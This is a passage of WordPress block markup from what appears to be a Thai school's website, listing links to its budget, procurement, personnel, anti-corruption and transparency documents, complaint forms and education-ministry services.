900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} 